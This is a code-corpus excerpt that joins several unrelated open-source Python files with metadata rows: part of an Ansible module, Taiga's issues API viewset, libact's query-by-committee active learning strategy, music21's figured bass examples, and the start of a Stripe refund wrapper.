type=dict(type='str', default='server', choices=['server', 'service']),
validate_certs=dict(type='bool', default=True),
),
)
rc = 0
try:
rc, result = core(module)
except Exception as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
if rc != 0:
module.fail_json(rc=rc, msg=result)
else:
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -1,848,312,706,524,774,000 | 25.483696 | 104 | 0.610507 | false |
dycodedev/taiga-back | taiga/projects/issues/api.py | 1 | 11959 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.utils.translation import ugettext as _
from django.db.models import Q
from django.http import HttpResponse
from taiga.base import filters
from taiga.base import exceptions as exc
from taiga.base import response
from taiga.base.decorators import detail_route, list_route
from taiga.base.api import ModelCrudViewSet, ModelListViewSet
from taiga.base.api.utils import get_object_or_404
from taiga.users.models import User
from taiga.projects.notifications.mixins import WatchedResourceMixin, WatchersViewSetMixin
from taiga.projects.occ import OCCResourceMixin
from taiga.projects.history.mixins import HistoryResourceMixin
from taiga.projects.models import Project, IssueStatus, Severity, Priority, IssueType
from taiga.projects.milestones.models import Milestone
from taiga.projects.votes.mixins.viewsets import VotedResourceMixin, VotersViewSetMixin
from . import models
from . import services
from . import permissions
from . import serializers
class IssueViewSet(OCCResourceMixin, VotedResourceMixin, HistoryResourceMixin, WatchedResourceMixin,
ModelCrudViewSet):
queryset = models.Issue.objects.all()
permission_classes = (permissions.IssuePermission, )
filter_backends = (filters.CanViewIssuesFilterBackend,
filters.OwnersFilter,
filters.AssignedToFilter,
filters.StatusesFilter,
filters.IssueTypesFilter,
filters.SeveritiesFilter,
filters.PrioritiesFilter,
filters.TagsFilter,
filters.WatchersFilter,
filters.QFilter,
filters.OrderByFilterMixin)
retrieve_exclude_filters = (filters.OwnersFilter,
filters.AssignedToFilter,
filters.StatusesFilter,
filters.IssueTypesFilter,
filters.SeveritiesFilter,
filters.PrioritiesFilter,
filters.TagsFilter,
filters.WatchersFilter,)
filter_fields = ("project",
"status__is_closed")
order_by_fields = ("type",
"status",
"severity",
"priority",
"created_date",
"modified_date",
"owner",
"assigned_to",
"subject",
"total_voters")
def get_serializer_class(self, *args, **kwargs):
if self.action in ["retrieve", "by_ref"]:
return serializers.IssueNeighborsSerializer
if self.action == "list":
return serializers.IssueListSerializer
return serializers.IssueSerializer
def update(self, request, *args, **kwargs):
self.object = self.get_object_or_none()
project_id = request.DATA.get('project', None)
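        # Moving an issue to another project requires remapping its milestone,
        # status, priority, severity and type to equivalents in the destination
        # project, falling back to that project's defaults.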
if project_id and self.object and self.object.project.id != project_id:
try:
new_project = Project.objects.get(pk=project_id)
self.check_permissions(request, "destroy", self.object)
self.check_permissions(request, "create", new_project)
sprint_id = request.DATA.get('milestone', None)
if sprint_id is not None and new_project.milestones.filter(pk=sprint_id).count() == 0:
request.DATA['milestone'] = None
status_id = request.DATA.get('status', None)
if status_id is not None:
try:
old_status = self.object.project.issue_statuses.get(pk=status_id)
new_status = new_project.issue_statuses.get(slug=old_status.slug)
request.DATA['status'] = new_status.id
except IssueStatus.DoesNotExist:
request.DATA['status'] = new_project.default_issue_status.id
priority_id = request.DATA.get('priority', None)
if priority_id is not None:
try:
old_priority = self.object.project.priorities.get(pk=priority_id)
new_priority = new_project.priorities.get(name=old_priority.name)
request.DATA['priority'] = new_priority.id
except Priority.DoesNotExist:
request.DATA['priority'] = new_project.default_priority.id
severity_id = request.DATA.get('severity', None)
if severity_id is not None:
try:
old_severity = self.object.project.severities.get(pk=severity_id)
new_severity = new_project.severities.get(name=old_severity.name)
request.DATA['severity'] = new_severity.id
except Severity.DoesNotExist:
request.DATA['severity'] = new_project.default_severity.id
type_id = request.DATA.get('type', None)
if type_id is not None:
try:
old_type = self.object.project.issue_types.get(pk=type_id)
new_type = new_project.issue_types.get(name=old_type.name)
request.DATA['type'] = new_type.id
except IssueType.DoesNotExist:
request.DATA['type'] = new_project.default_issue_type.id
except Project.DoesNotExist:
return response.BadRequest(_("The project doesn't exist"))
return super().update(request, *args, **kwargs)
def get_queryset(self):
qs = super().get_queryset()
qs = qs.prefetch_related("attachments")
qs = self.attach_votes_attrs_to_queryset(qs)
return self.attach_watchers_attrs_to_queryset(qs)
def pre_save(self, obj):
if not obj.id:
obj.owner = self.request.user
super().pre_save(obj)
def pre_conditions_on_save(self, obj):
super().pre_conditions_on_save(obj)
if obj.milestone and obj.milestone.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this sprint "
"to this issue."))
if obj.status and obj.status.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this status "
"to this issue."))
if obj.severity and obj.severity.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this severity "
"to this issue."))
if obj.priority and obj.priority.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this priority "
"to this issue."))
if obj.type and obj.type.project != obj.project:
raise exc.PermissionDenied(_("You don't have permissions to set this type "
"to this issue."))
@list_route(methods=["GET"])
def by_ref(self, request):
ref = request.QUERY_PARAMS.get("ref", None)
project_id = request.QUERY_PARAMS.get("project", None)
issue = get_object_or_404(models.Issue, ref=ref, project_id=project_id)
return self.retrieve(request, pk=issue.pk)
@list_route(methods=["GET"])
def filters_data(self, request, *args, **kwargs):
project_id = request.QUERY_PARAMS.get("project", None)
project = get_object_or_404(Project, id=project_id)
filter_backends = self.get_filter_backends()
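        # Each facet is computed with its own filter backend excluded, so its
        # counts reflect only the other active filters.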
types_filter_backends = (f for f in filter_backends if f != filters.IssueTypesFilter)
statuses_filter_backends = (f for f in filter_backends if f != filters.StatusesFilter)
assigned_to_filter_backends = (f for f in filter_backends if f != filters.AssignedToFilter)
owners_filter_backends = (f for f in filter_backends if f != filters.OwnersFilter)
priorities_filter_backends = (f for f in filter_backends if f != filters.PrioritiesFilter)
severities_filter_backends = (f for f in filter_backends if f != filters.SeveritiesFilter)
tags_filter_backends = (f for f in filter_backends if f != filters.TagsFilter)
queryset = self.get_queryset()
querysets = {
"types": self.filter_queryset(queryset, filter_backends=types_filter_backends),
"statuses": self.filter_queryset(queryset, filter_backends=statuses_filter_backends),
"assigned_to": self.filter_queryset(queryset, filter_backends=assigned_to_filter_backends),
"owners": self.filter_queryset(queryset, filter_backends=owners_filter_backends),
"priorities": self.filter_queryset(queryset, filter_backends=priorities_filter_backends),
"severities": self.filter_queryset(queryset, filter_backends=severities_filter_backends),
"tags": self.filter_queryset(queryset)
}
return response.Ok(services.get_issues_filters_data(project, querysets))
@list_route(methods=["GET"])
def csv(self, request):
uuid = request.QUERY_PARAMS.get("uuid", None)
if uuid is None:
return response.NotFound()
project = get_object_or_404(Project, issues_csv_uuid=uuid)
queryset = project.issues.all().order_by('ref')
data = services.issues_to_csv(project, queryset)
csv_response = HttpResponse(data.getvalue(), content_type='application/csv; charset=utf-8')
csv_response['Content-Disposition'] = 'attachment; filename="issues.csv"'
return csv_response
@list_route(methods=["POST"])
def bulk_create(self, request, **kwargs):
serializer = serializers.IssuesBulkSerializer(data=request.DATA)
if serializer.is_valid():
data = serializer.data
project = Project.objects.get(pk=data["project_id"])
self.check_permissions(request, 'bulk_create', project)
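            # Issues created in bulk inherit the project's default status,
            # severity, priority and type.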
issues = services.create_issues_in_bulk(
data["bulk_issues"], project=project, owner=request.user,
status=project.default_issue_status, severity=project.default_severity,
priority=project.default_priority, type=project.default_issue_type,
callback=self.post_save, precall=self.pre_save)
issues_serialized = self.get_serializer_class()(issues, many=True)
return response.Ok(data=issues_serialized.data)
return response.BadRequest(serializer.errors)
class IssueVotersViewSet(VotersViewSetMixin, ModelListViewSet):
permission_classes = (permissions.IssueVotersPermission,)
resource_model = models.Issue
class IssueWatchersViewSet(WatchersViewSetMixin, ModelListViewSet):
permission_classes = (permissions.IssueWatchersPermission,)
resource_model = models.Issue
| agpl-3.0 | 6,412,214,018,278,567,000 | 46.63745 | 103 | 0.61487 | false |
ntucllab/libact | libact/query_strategies/query_by_committee.py | 1 | 7425 | """Query by committee
This module contains a class that implements Query by committee active learning
algorithm.
"""
from __future__ import division
import logging
import math
import numpy as np
from libact.base.dataset import Dataset
from libact.base.interfaces import QueryStrategy, ProbabilisticModel
import libact.models
from libact.utils import inherit_docstring_from, seed_random_state, zip
LOGGER = logging.getLogger(__name__)
class QueryByCommittee(QueryStrategy):
r"""Query by committee
Parameters
----------
models : list of :py:mod:`libact.models` instances or str
This parameter accepts a list of initialized libact Model instances,
or class names of libact Model classes to determine the models to be
included in the committee to vote for each unlabeled instance.
disagreement : ['vote', 'kl_divergence'], optional (default='vote')
Sets the method for measuring disagreement between models.
'vote' represents vote entropy.
kl_divergence requires models being ProbabilisticModel
    random_state : {int, np.random.RandomState instance, None}, optional (default=None)
        If int or None, random_state is passed as a parameter to generate a
        np.random.RandomState instance. If an np.random.RandomState instance is
        given, it is used directly as the random number generator.
Attributes
----------
students : list, shape = (len(models))
A list of the model instances used in this algorithm.
    random_state\_ : np.random.RandomState instance
        The random number generator in use.
Examples
--------
Here is an example of declaring a QueryByCommittee query_strategy object:
.. code-block:: python
from libact.query_strategies import QueryByCommittee
from libact.models import LogisticRegression
qs = QueryByCommittee(
dataset, # Dataset object
models=[
LogisticRegression(C=1.0),
LogisticRegression(C=0.1),
],
)
References
----------
.. [1] Seung, H. Sebastian, Manfred Opper, and Haim Sompolinsky. "Query by
committee." Proceedings of the fifth annual workshop on
Computational learning theory. ACM, 1992.
"""
def __init__(self, *args, **kwargs):
super(QueryByCommittee, self).__init__(*args, **kwargs)
self.disagreement = kwargs.pop('disagreement', 'vote')
models = kwargs.pop('models', None)
if models is None:
raise TypeError(
"__init__() missing required keyword-only argument: 'models'"
)
elif not models:
raise ValueError("models list is empty")
if self.disagreement == 'kl_divergence':
for model in models:
if not isinstance(model, ProbabilisticModel):
raise TypeError(
"Given disagreement set as 'kl_divergence', all models"
"should be ProbabilisticModel."
)
random_state = kwargs.pop('random_state', None)
self.random_state_ = seed_random_state(random_state)
self.students = list()
for model in models:
if isinstance(model, str):
self.students.append(getattr(libact.models, model)())
else:
self.students.append(model)
self.n_students = len(self.students)
self.teach_students()
def _vote_disagreement(self, votes):
"""
        Return the disagreement measurement of the given votes.
        It uses vote entropy to measure the disagreement.
Parameters
----------
votes : list of int, shape==(n_samples, n_students)
The predictions that each student gives to each sample.
Returns
-------
disagreement : list of float, shape=(n_samples)
The vote entropy of the given votes.
"""
ret = []
for candidate in votes:
ret.append(0.0)
lab_count = {}
for lab in candidate:
lab_count[lab] = lab_count.setdefault(lab, 0) + 1
# Using vote entropy to measure disagreement
for lab in lab_count.keys():
ret[-1] -= lab_count[lab] / self.n_students * \
math.log(float(lab_count[lab]) / self.n_students)
return ret
def _kl_divergence_disagreement(self, proba):
"""
        Calculate the Kullback-Leibler (KL) divergence disagreement measure.
Parameters
----------
proba : array-like, shape=(n_samples, n_students, n_class)
Returns
-------
disagreement : list of float, shape=(n_samples)
The kl_divergence of the given probability.
"""
n_students = np.shape(proba)[1]
consensus = np.mean(proba, axis=1) # shape=(n_samples, n_class)
# average probability of each class across all students
consensus = np.tile(consensus, (n_students, 1, 1)).transpose(1, 0, 2)
kl = np.sum(proba * np.log(proba / consensus), axis=2)
return np.mean(kl, axis=1)
def _labeled_uniform_sample(self, sample_size):
"""sample labeled entries uniformly"""
X, y = self.dataset.get_labeled_entries()
samples_idx = [self.random_state_.randint(0, X.shape[0]) for _ in range(sample_size)]
return Dataset(X[samples_idx], np.array(y)[samples_idx])
def teach_students(self):
"""
Train each model (student) with the labeled data using bootstrap
aggregating (bagging).
"""
dataset = self.dataset
for student in self.students:
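            # Bootstrap: draw a uniform sample (with replacement) from the
            # labeled pool, re-drawing until every class is represented.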
bag = self._labeled_uniform_sample(int(dataset.len_labeled()))
while bag.get_num_of_labels() != dataset.get_num_of_labels():
bag = self._labeled_uniform_sample(int(dataset.len_labeled()))
LOGGER.warning('There is student receiving only one label,'
're-sample the bag.')
student.train(bag)
@inherit_docstring_from(QueryStrategy)
def update(self, entry_id, label):
# Train each model with newly updated label.
self.teach_students()
@inherit_docstring_from(QueryStrategy)
def make_query(self):
dataset = self.dataset
unlabeled_entry_ids, X_pool = dataset.get_unlabeled_entries()
if self.disagreement == 'vote':
# Let the trained students vote for unlabeled data
votes = np.zeros((len(X_pool), len(self.students)))
for i, student in enumerate(self.students):
votes[:, i] = student.predict(X_pool)
vote_entropy = self._vote_disagreement(votes)
ask_idx = self.random_state_.choice(
np.where(np.isclose(vote_entropy, np.max(vote_entropy)))[0])
elif self.disagreement == 'kl_divergence':
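            # Stack per-student class probabilities into shape
            # (n_samples, n_students, n_class) before measuring divergence.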
proba = []
for student in self.students:
proba.append(student.predict_proba(X_pool))
proba = np.array(proba).transpose(1, 0, 2).astype(float)
avg_kl = self._kl_divergence_disagreement(proba)
ask_idx = self.random_state_.choice(
np.where(np.isclose(avg_kl, np.max(avg_kl)))[0])
return unlabeled_entry_ids[ask_idx]
| bsd-2-clause | 4,343,440,021,166,972,000 | 34.526316 | 93 | 0.598923 | false |
arnavd96/Cinemiezer | myvenv/lib/python3.4/site-packages/music21/figuredBass/examples.py | 1 | 19212 | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: examples.py
# Purpose: music21 class which allows running of test cases
# Authors: Jose Cabal-Ugaz
#
# Copyright: Copyright © 2010-2011 Michael Scott Cuthbert and the music21 Project
# License: LGPL or BSD, see license.txt
#-------------------------------------------------------------------------------
'''
Each of the example methods in this module provides a figured bass line as a
:class:`~music21.figuredBass.realizer.FiguredBassLine` instance.
These can be realized by calling :meth:`~music21.figuredBass.realizer.FiguredBassLine.realize`, which takes in an
optional :class:`~music21.figuredBass.rules.Rules` object. The result is a :class:`~music21.figuredBass.realizer.Realization`
object which can generate realizations as instances of :class:`~music21.stream.Score`. These realizations can then be displayed
in external software such as MuseScore or Finale by calling :meth:`~music21.base.Music21Object.show`.
'''
import copy
import unittest
from music21.figuredBass import realizer
from music21.figuredBass import rules
#-------------------------------------------------------------------------------
def exampleA():
'''
This example was a homework assignment for 21M.302: Harmony & Counterpoint II
at MIT in the fall of 2010, taught by Charles Shadle of the MIT Music Program.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleA()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineA.*
:width: 700
The following is a realization of fbLine in four parts using the default rules set.
The soprano part is limited to stepwise motion, and the alto and tenor parts are
limited to motions within a perfect octave.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.partMovementLimits = [(1,2),(2,12),(3,12)]
>>> fbRealization1 = fbLine.realize(fbRules)
>>> fbRealization1.getNumSolutions()
360
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1A.*
:width: 700
Now, the restriction on upper parts being within a perfect octave of each other is
removed, and fbLine is realized again.
>>> fbRules.upperPartsMaxSemitoneSeparation = None
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.keyboardStyleOutput = False
>>> fbRealization2.getNumSolutions()
3713168
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2A.*
:width: 700
'''
from music21 import converter
s = converter.parse("tinynotation: 3/2 C2 D2_6 E2_6 F2_6 C#2_b7,5,3 D2 BB2_#6,5,3 C2_6 AA#2_7,5,#3 BB1_6,4 BB2_7,#5,#3 E1.", makeNotation=False)
return realizer.figuredBassFromStream(s)
def exampleD():
'''
This example was a homework assignment for 21M.302: Harmony & Counterpoint II
at MIT in the fall of 2010, taught by Charles Shadle of the MIT Music Program.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleD()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineD.*
:width: 700
The following is a realization of fbLine in four parts using the default rules set.
The soprano part is limited to stepwise motion, and the alto and tenor parts are
limited to motions within a perfect octave.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.partMovementLimits = [(1,2),(2,12),(3,12)]
>>> fbRealization1 = fbLine.realize(fbRules)
>>> fbRealization1.getNumSolutions()
1560
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1D.*
:width: 700
Now, the restriction on voice overlap is lifted, which is common in keyboard-style
figured bass, and fbLine is realized again. Voice overlap can be seen in the fourth
measure.
>>> fbRules.forbidVoiceOverlap = False
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.getNumSolutions()
109006
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2D.*
:width: 700
Now, the restriction on voice overlap is reset, but the restriction on the upper parts
being within a perfect octave of each other is removed. fbLine is realized again.
>>> fbRules.forbidVoiceOverlap = True
>>> fbRules.upperPartsMaxSemitoneSeparation = None
>>> fbRealization3 = fbLine.realize(fbRules)
>>> fbRealization3.getNumSolutions()
29629539
>>> fbRealization3.keyboardStyleOutput = False
>>> #_DOCS_SHOW fbRealization3.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol3D.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 3/4 BB4 C#4_#6 D4_6 E2 E#4_7,5,#3 F#2_6,4 F#4_5,#3 G2 E4_6 F#2_6,4 E4_#4,2 D2_6 EE4_7,5,#3 AA2.", makeNotation=False)
s.insert(0, key.Key('b'))
return realizer.figuredBassFromStream(s)
def exampleB():
'''
This example was retrieved from page 114 of *The Music Theory Handbook* by Marjorie Merryman.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleB()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineB.*
:width: 700
First, fbLine is realized with the default rules set.
>>> fbRealization1 = fbLine.realize()
>>> fbRealization1.getNumSolutions()
422
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1B.*
:width: 700
Now, a Rules object is created, and the restriction that the chords
need to be complete is lifted. fbLine is realized once again.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.forbidIncompletePossibilities = False
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.getNumSolutions()
188974
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2B.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 D4 A4_7,5,#3 B-4 F4_6 G4_6 AA4_7,5,#3 D2", makeNotation=False)
s.insert(0, key.Key('d'))
return realizer.figuredBassFromStream(s)
def exampleC():
'''
This example was retrieved from page 114 of *The Music Theory Handbook* by Marjorie Merryman.
>>> from music21.figuredBass import examples
>>> fbLine = examples.exampleC()
>>> #_DOCS_SHOW fbLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bassLineC.*
:width: 700
First, fbLine is realized with the default rules set.
>>> fbRealization1 = fbLine.realize()
>>> fbRealization1.getNumSolutions()
833
>>> #_DOCS_SHOW fbRealization1.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol1C.*
:width: 700
Now, parallel fifths are allowed in realizations. The image below
shows one of them. There is a parallel fifth between the bass and
alto parts going from the half-diminished 6,5 (B,F#) to the dominant
seventh (C#,G#) in the second measure.
>>> from music21.figuredBass import rules
>>> fbRules = rules.Rules()
>>> fbRules.forbidParallelFifths = False
>>> fbRealization2 = fbLine.realize(fbRules)
>>> fbRealization2.getNumSolutions()
2427
>>> #_DOCS_SHOW fbRealization2.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_sol2C.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 FF#4 GG#4_#6 AA4_6 FF#4 BB4_6,5 C#4_7,5,#3 F#2", makeNotation=False)
s.insert(0, key.Key('f#'))
return realizer.figuredBassFromStream(s)
def V43ResolutionExample():
'''
The dominant 4,3 can resolve to either the tonic 5,3 or tonic 6,3. The proper resolution
is dependent on the bass note of the tonic, and is determined in context, as shown in the
following figured bass realization.
>>> from music21.figuredBass import examples
>>> fbLine = examples.V43ResolutionExample()
>>> fbRealization = fbLine.realize()
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_V43.*
:width: 350
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 D2 E2_4,3 D2_5,3 E2_4,3 F#1_6,3", makeNotation=False)
s.insert(0, key.Key('D'))
return realizer.figuredBassFromStream(s)
def viio65ResolutionExample():
'''
For a fully diminished seventh chord resolving to the tonic, the resolution chord
can contain either a doubled third (standard resolution) or a doubled tonic (alternate
resolution), depending on whether the third of the diminished chord rises or falls.
The user can control this in a Rules object by modifying :attr:`~music21.figuredBass.rules.Rules.doubledRootInDim7`.
However, when resolving a diminished 6,5, the third is found in the bass and the
proper resolution is determined in context, regardless of user preference.
The following shows both cases involving a diminished 6,5. The resolution of the
first diminished chord has a doubled D, while that of the second has a doubled F#.
Notice that the resolution of the first involves a diminished fifth (E, Bb) going
to a perfect fifth (D, A).
>>> from music21.figuredBass import examples
>>> fbLine = examples.viio65ResolutionExample()
>>> fbRealization = fbLine.realize()
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_vii65.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinyNotation: 4/4 D2 E2_6,b5 D2 E2_6,b5 F#1_6", makeNotation=False)
s.insert(0, key.Key('D'))
return realizer.figuredBassFromStream(s)
def augmentedSixthResolutionExample():
'''
This example was retrieved from page 61 of *The Music Theory Handbook* by Marjorie Merryman.
Italian (8,#6,3), French (#6,4,3), German (#6,5,3), and Swiss (#6,#4,3) augmented sixth resolutions to
either the major dominant or the major/minor tonic 6,4 are supported. The first four bars show the
resolutions to the dominant in the order above, while the last bar shows the German augmented sixth
resolving to the tonic.
>>> from music21.figuredBass import examples
>>> fbLine = examples.augmentedSixthResolutionExample()
>>> fbRealization = fbLine.realize()
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_a6.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: 4/4 D4 BB-4_8,#6,3 AA2_# D4 BB-4_#6,4,3 AA2_# D4 BB-4_#6,5,3 AA2_# D4 BB-4_#6,#4,3 AA2_# D4 BB-4_#6,5,3 AA2_6,4", makeNotation=False)
s.insert(0, key.Key('d'))
return realizer.figuredBassFromStream(s)
def italianA6ResolutionExample():
'''
The Italian augmented sixth chord (It+6) is the only augmented sixth chord to consist of only three
pitch names, and when represented in four parts, the tonic is doubled. The tonic can resolve up, down or
stay the same, and in four parts, the two tonics always resolve differently, resulting in two equally
acceptable resolutions. An alternate approach to resolving the It+6 chord was taken, such that an It+6
chord could map internally to two different resolutions. Every other special resolution in fbRealizer
consists of a 1:1 mapping of special chords to resolutions.
Here, the It+6 chord is resolving to the dominant, minor tonic, and major tonic, respectively. In the
dominant resolution shown, the tonics (D) are resolving inward, but they can resolve outward as well. In
the minor tonic resolution, the higher tonic is resolving up to F, and the lower tonic remains the same.
In the major tonic resolution, the higher tonic remains the same, while the lower tonic resolves up to the F#.
>>> from music21.figuredBass import examples
>>> from music21.figuredBass import rules
>>> fbLine = examples.italianA6ResolutionExample()
>>> fbRules = rules.Rules()
>>> fbRules.upperPartsMaxSemitoneSeparation = None
>>> fbRules.partMovementLimits.append([1,4])
>>> fbRealization = fbLine.realize(fbRules)
>>> fbRealization.keyboardStyleOutput = False
>>> #_DOCS_SHOW fbRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_it+6.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: D4 BB-4_#6,3 AA2_# D4 BB-4_#6,3 AA2_6,4 D4 BB-4_#6,3 AA2_#6,4", makeNotation=False)
s.insert(0, key.Key('d'))
return realizer.figuredBassFromStream(s)
def twelveBarBlues():
'''
    This is a progression in Bb major based on the twelve bar blues. The progression used is:
I | IV | I | I7
IV | IV | I | I7
V7 | IV6 | I | I
>>> from music21.figuredBass import examples
>>> from music21.figuredBass import rules
>>> bluesLine = examples.twelveBarBlues()
>>> #_DOCS_SHOW bluesLine.generateBassLine().show()
.. image:: images/figuredBass/fbExamples_bluesBassLine.*
:width: 700
>>> fbRules = rules.Rules()
>>> fbRules.partMovementLimits = [(1,4),(2,12),(3,12)]
>>> fbRules.forbidVoiceOverlap = False
>>> blRealization = bluesLine.realize(fbRules)
>>> blRealization.getNumSolutions()
2224978
>>> #_DOCS_SHOW blRealization.generateRandomRealization().show()
.. image:: images/figuredBass/fbExamples_twelveBarBlues.*
:width: 700
'''
from music21 import converter, key
s = converter.parse("tinynotation: BB-1 E-1 BB-1 BB-1_7 E-1 E-1 BB-1 BB-1_7 F1_7 G1_6 BB-1 BB-1", makeNotation=False)
s.insert(0, key.Key('B-'))
return realizer.figuredBassFromStream(s)
# -----------------------------------------------------------------
# METHODS FOR GENERATION OF BLUES VAMPS
def generateBoogieVamp(blRealization=None, numRepeats=5):
'''
Turns whole notes in twelve bar blues bass line to blues boogie woogie bass line. Takes
in numRepeats, which is the number of times to repeat the bass line. Also, takes in a
realization of :meth:`~music21.figuredBass.examples.twelveBarBlues`. If none is provided,
a default realization with :attr:`~music21.figuredBass.rules.Rules.forbidVoiceOverlap`
set to False and :attr:`~music21.figuredBass.rules.Rules.partMovementLimits` set to
[(1,4),(2,12),(3,12)] is used.
>>> from music21.figuredBass import examples
>>> #_DOCS_SHOW examples.generateBoogieVamp(numRepeats = 1).show()
.. image:: images/figuredBass/fbExamples_boogieVamp.*
:width: 700
'''
from music21 import converter, stream, interval
    if blRealization is None:
bluesLine = twelveBarBlues()
fbRules = rules.Rules()
fbRules.partMovementLimits = [(1,4),(2,12),(3,12)]
fbRules.forbidVoiceOverlap = False
blRealization = bluesLine.realize(fbRules)
sampleScore = blRealization.generateRandomRealizations(numRepeats)
boogieBassLine = converter.parse("tinynotation: BB-8. D16 F8. G16 A-8. G16 F8. D16", makeNotation=False)
newBassLine = stream.Part()
newBassLine.append(sampleScore[1][0]) #Time signature
newBassLine.append(sampleScore[1][1]) #Key signature
for n in sampleScore[1].notes:
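        # Transpose the one-bar boogie figure so it starts on this bass note,
        # carrying over any lyric annotations from the realization.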
i = interval.notesToInterval(boogieBassLine[0], n)
tp = boogieBassLine.transpose(i)
for lyr in n.lyrics:
tp.notes[0].addLyric(lyr.text)
for m in tp.notes:
newBassLine.append(m)
newScore = stream.Score()
newScore.insert(0, sampleScore[0])
newScore.insert(newBassLine)
return newScore
def generateTripletBlues(blRealization=None, numRepeats=5):  # 12/8
'''
Turns whole notes in twelve bar blues bass line to triplet blues bass line. Takes
in numRepeats, which is the number of times to repeat the bass line. Also, takes in a
realization of :meth:`~music21.figuredBass.examples.twelveBarBlues`. If none is provided,
a default realization with :attr:`~music21.figuredBass.rules.Rules.forbidVoiceOverlap`
set to False and :attr:`~music21.figuredBass.rules.Rules.partMovementLimits` set to
[(1,4),(2,12),(3,12)] is used.
>>> from music21.figuredBass import examples
>>> #_DOCS_SHOW examples.generateTripletBlues(numRepeats = 1).show()
.. image:: images/figuredBass/fbExamples_tripletBlues.*
:width: 700
'''
from music21 import converter, stream, interval, meter
    if blRealization is None:
bluesLine = twelveBarBlues()
fbRules = rules.Rules()
fbRules.partMovementLimits = [(1,4),(2,12),(3,12)]
fbRules.forbidVoiceOverlap = False
blRealization = bluesLine.realize(fbRules)
sampleScore = blRealization.generateRandomRealizations(numRepeats)
tripletBassLine = converter.parse("tinynotation: BB-4 BB-8 D4 D8 F4 F8 A-8 G8 F8", makeNotation=False)
newBassLine = stream.Part()
for n in sampleScore[1].notes:
i = interval.notesToInterval(tripletBassLine[0], n)
tp = tripletBassLine.transpose(i)
for lyr in n.lyrics:
tp.notes[0].addLyric(lyr.text)
for m in tp.notes:
newBassLine.append(m)
newTopLine = stream.Part()
for sampleChord in sampleScore[0].notes:
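        # Stretch each realized chord to a full 12/8 bar (quarterLength 6.0)
        # so the upper parts sustain over the triplet bass figure.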
sampleChordCopy = copy.deepcopy(sampleChord)
sampleChordCopy.quarterLength = 6.0
newTopLine.append(sampleChordCopy)
newScore = stream.Score()
newScore.append(meter.TimeSignature("12/8")) #Time signature
newScore.append(sampleScore[1][1]) #Key signature
newScore.insert(0, newTopLine)
newScore.insert(0, newBassLine)
return newScore
_DOC_ORDER = [exampleA, exampleB, exampleC, exampleD, V43ResolutionExample, viio65ResolutionExample,
augmentedSixthResolutionExample, italianA6ResolutionExample, twelveBarBlues,
generateBoogieVamp, generateTripletBlues]
#-------------------------------------------------------------------------------
class Test(unittest.TestCase):
def runTest(self):
pass
if __name__ == "__main__":
import music21
music21.mainTest(Test)
#------------------------------------------------------------------------------
# eof
| mit | 3,849,884,331,369,982,500 | 39.787686 | 172 | 0.665764 | false |
willprice/arduino-sphere-project | scripts/example_direction_finder/temboo/Library/Stripe/Charges/RefundCharge.py | 5 | 3456 | # -*- coding: utf-8 -*-
###############################################################################
#
# RefundCharge
# Issues a refund of an existing credit card charge.
#
